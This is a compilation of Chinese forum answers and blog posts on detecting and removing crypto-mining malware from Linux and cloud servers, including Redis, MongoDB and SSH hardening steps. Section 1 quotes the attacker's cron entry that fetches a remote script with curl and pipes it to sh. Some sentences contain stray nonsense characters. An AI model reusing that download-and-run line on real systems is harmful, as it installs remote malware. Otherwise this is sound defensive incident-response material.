伺服器有挖礦程序

㈠ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

㈡ 記一次清理伺服器挖礦程序注入kdevtmpfs

前幾天突然發現公司伺服器很卡，CPU經常飆到200%；網站服務被自動停止，甚至伺服器崩潰；於是進行排查，發現一個名為：kdevtmpfs的進程佔用了180%多的CPU，嚇了一跳，於是趕緊排查問題：首先查到這個進程並不少我們伺服器用到的進程，於是在網上查找這個問題，發現很多人都遇到過，於是根據網上的一個教程開始清理：

1、刪除掉/tmp文件下的kdevtmpfs文件；刪除掉kdevtmpfs對應的進程，清理掉定時任務；（無效，幾分鍾後依然會自動重啟，自動在定時任務新增定時任務）（ https://blog.csdn.net/qq503758762/article/details/103714342 ）

2、修改定時任務，不允許新增定時任務，復述1的步驟；（嘩枝無效，依然會自動重新啟動）；

3、經歷上述兩個方法都無效之後，做了以下操作：a、先用top命令查看進程號；b、根據systemctl status進程號命令，查看該進程對應的父進程；把對應進程下的程序都幹掉；重復幾次發現都是一個叫做kingsfdt的進程會和這個kdevtmpfs同時啟動；c、查看kingsfdt的進程，亂旅敏發現這也是一個陌生的進程，先不kill掉;d:查看系統防火牆，發現對應的23549埠不知道什麼時候開放的，並且對應的是kingsfdt這個進程，於是果斷把這個進程幹掉，同時把埠號封掉；e、再回頭刪除tmp下的kdevtmpfs文件，再依次刪除兩個陌生進程；f、登錄AWS控制台，把ssh埠改掉，22埠封掉；進入ssh修改root密碼，設定只鎮和能本地登錄；重啟伺服器；觀察了一天，發現服務穩定了，系統也正常運行了，CPU也正常了。開心。

㈢ 伺服器被攻擊並植入kdevtmpfsi挖礦/病毒/木馬

MongoDB庫中的數據莫名其妙沒有了，發覺如下信息：

1、 top -d 5命令 ，查看系統負載情況、是否有未知進程，發現一個名為kdevtmpfsi的進程，經科普它是一個挖礦程序，會佔用伺服器高額的CPU、內存資源。如圖，CPU佔用率高達788.7%，而且是yarn用戶下：

2、 ps -ef |grep kdevtmpfsi 命令查看 該挖礦程序路徑：/tmp/kdevtmpfsi

3、 ps -ef |grep yarn 命令查看更多關於yarn相關進程信息（此時我的伺服器並沒有開啟yarn服務，如果有yarn的相關進程則可判斷是攻擊者開啟的進程），發現另外還有個kinsing進程，經科普kinsing進程是kdevtmpfsi的守護進程：

4、 netstat -lntupaa 命令查看是否有異常的ip,果然發現194.87.102.77這個陌生的ip，判斷是kdevtmpfsi的發出者：

5、經查詢該ip的所在國家是俄羅斯：

6、 find / -iname kdevtmpfsi 命令再次確定命令所在位置以便刪除：

7、 cd /tmp 進入相關目錄：

8、 rm -rf kdevtmpfsi 刪除kdevtmpfsi程序：

9、** kill -9 40422**殺掉kdevtmpfsi進程：

10、發現並沒殺掉所有kdevtmpfsi進程，再次查找yarn的相關進程（因為之前已確認病毒是在yarn下），果真還有kdevtmpfsi進程存在：

11、用命令 批量殺掉 相關進程：

12、刪除kinsing文件：

13、現在，已經把挖礦程序及相關進程刪除掉了，但是還有兩處沒做處理：

14、 crontab -l 命令先看看crontab的定時任務列表吧：

15、編寫刪除挖礦程序腳本 kill_kdevtmpfsi.sh ：

16、新增 定時任務 並刪除攻擊者的挖礦定時任務：

17、 crontab -l命令 查看現在只有殺進程的定時任務了：

18、禁止黑客的IP地址。

最初安裝MongoDB時，並未設置密碼認證，存在漏洞，導致黑客通過漏洞攻擊伺服器，並在程序里植入木馬/病毒。單純的kill -9 id殺掉病毒進程是殺不徹底的，治標不治本，應該定時刪除病毒進程，禁止攻擊者IP，重新安裝系統或相關軟體。

經過幾天的觀察，伺服器運行正常，再沒有被黑客攻擊成功。

㈣ 伺服器被檢測出挖礦

有位朋友說，他伺服器使用的好好的，服務商突然封了他伺服器，說是被檢測出挖礦，這位朋友一臉懵「我開游戲的，挖什麼礦」。突然地關停伺服器導致這位朋友損失慘重，那麼為什麼會被檢測出挖礦，以及怎麼處理呢？感興趣的話就繼續往下看吧~

遇到以上問題，需要先找伺服器商對其說明實際情況，配合他們排查，基本上就是中了挖礦病毒。

最簡單的方法就是重裝系統，但是系統盤數據都會清空，這種辦法適用於伺服器里沒什麼需要備份的文件。如果選擇重裝系統，需要把自己的文件掃毒一遍確認安全後再導入伺服器。

但是伺服器里如果有很多重要的文件還有比較難配置的環境，那就需要排查刪除挖礦程序，全盤掃毒，刪除可疑文件，一個個修復病毒對系統的修改。

防範建議：

1.盡量不要使用默認密碼和埠，改一個比較復雜的密碼

2.可以使用寶塔面板登陸伺服器

3.系統自帶的防火牆、安全防護都不要關閉

㈤ 如何用Linux伺服器挖礦教程

今天早上起來一看，伺服器腳本一個都沒有啟動!甚是奇怪，遠程登錄伺服器，也是異常的卡，直到最後卡死，只好重新啟動伺服器!
啟動之後沒一會又會變卡，越來越卡，top查看進程！不覺又奇怪的進程，因為平常也不經常看！所以自己也搞不明白怎麼回事兒！只好到群里問了問，說是被挖礦的掛了木馬文件了，是由於redis的漏洞!
後來我自己發現，原來redis遠程可以直接登錄，原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢，看來是我想多了
看了好長時間才發現一個異常的進程，自啟的進程 molibe ！
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下，打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下，cat root 查看定時器的執行發現之前腳本都被改了，顧不得刪除cron，service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了！但是根本是因為redis漏洞，所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)

㈥ 雲伺服器中挖礦病毒的清除過程（二）

發現一台伺服器，CPU使用率一直50%左右，top查看一進程名稱為
-bash，按c查看詳情，名稱顯示為python
十分可疑

殺掉進程，清空crontab內容，並刪除此目錄文件，發現過一陣進程又被啟動起來了
查看/etc/cron.hourly，發現有一個sync文件，還是會定時執行，內容為

此文件還被加了保護許可權，需要用chattr去除後刪除

cron.daily cron.weekly cron.monthly裡面也有
同樣方法刪除/bin/sysdrr
至此病毒被徹底清除

刪除/opt/.new目錄時，發現此目錄下還有一個/opt/.md目錄，內容如下

病毒運行原理是

其他常用的診斷命令

關聯文章：
雲伺服器中挖礦病毒的清除過程
伺服器中毒導致的wget等系統命令失效後的恢復

參考文章：
【PC樣本分析】記錄最近與挖礦病毒的鬥智斗勇
【PC樣本分析】記錄最近與挖礦病毒的鬥智斗勇(二)

㈦ 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

㈧ 阿里雲windows伺服器中了挖礦的病毒怎麼清理

光刪除沒用的，因為沒有解決好漏洞。
建議是重做系統，然後找護衛神給你做一下系統安全加固，把漏洞徹底堵住才有效果。

㈨ 新買的雲伺服器提示挖礦

利用雲電腦的計算資源執行挖礦的持續性程序,
已停止是服務絕大數都是正常的。這些已停止表示你已經禁用或停止了相關的服務，但停止不是卸載，所以它們仍然存在是正常的，每台電腦里都有許多已停止的差念服務，不用擔心。你真正要擔心的是360那個提示，可在任務管理器中查著虛兄困活動進程，若某進程CPU或內存佔用高，而你又不明確該進程是塵肢幹嘛的，可以先結束進程再看看360還會不會提醒!